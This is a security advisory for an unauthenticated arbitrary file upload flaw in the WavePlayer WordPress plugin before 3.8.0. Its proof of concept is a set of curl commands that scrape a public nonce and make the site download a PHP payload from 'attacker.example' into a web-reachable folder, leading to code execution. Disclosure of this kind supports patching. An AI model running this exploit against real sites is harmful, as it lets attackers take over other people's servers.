WavePlayer < 3.8.0 – Unauthenticated Arbitrary File Upload | CVE 2025-12057

Description

The plugin does not have authorization in an AJAX action as well as does not validate the file to be copied locally, allowing unauthenticated users to upload arbitrary file on the server and lead to RCE

Proof of Concept

# Fetch a nonce exposed on any public page
nonce=$(curl -sk https://target.example/ \
| grep -o 'ajax_nonce":"[^"]*' \
| cut -d'"' -f3)

# Trigger create_local_copy to pull a remote PHP payload
curl -sk -X POST 'https://target.example/?wvpl-ajax=create_local_copy' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data "nonce=${nonce}&url=https://attacker.example/payload.php"

# Response contains the web-accessible file, e.g.:
{"success":true,"data":{"track":{"filesize":22,"poster":"https:\/\/target.example\/wp-content\/plugins\/waveplayer\/assets\/img\/waveplayer.jpg","poster_thumbnail":"https:\/\/target.example\/wp-content\/plugins\/waveplayer\/assets\/img\/waveplayer.jpg","poster_srcset":"","temp_file":"https:\/\/target.example\/wp-content\/uploads\/peaks\/external\/ecce912897f8bc90381f7ebc3e175f2f.php","type":"external","id":"ecce912897f8bc90381f7ebc3e175f2f","file":"https:\/\/attacker.example\/payload.php"}}}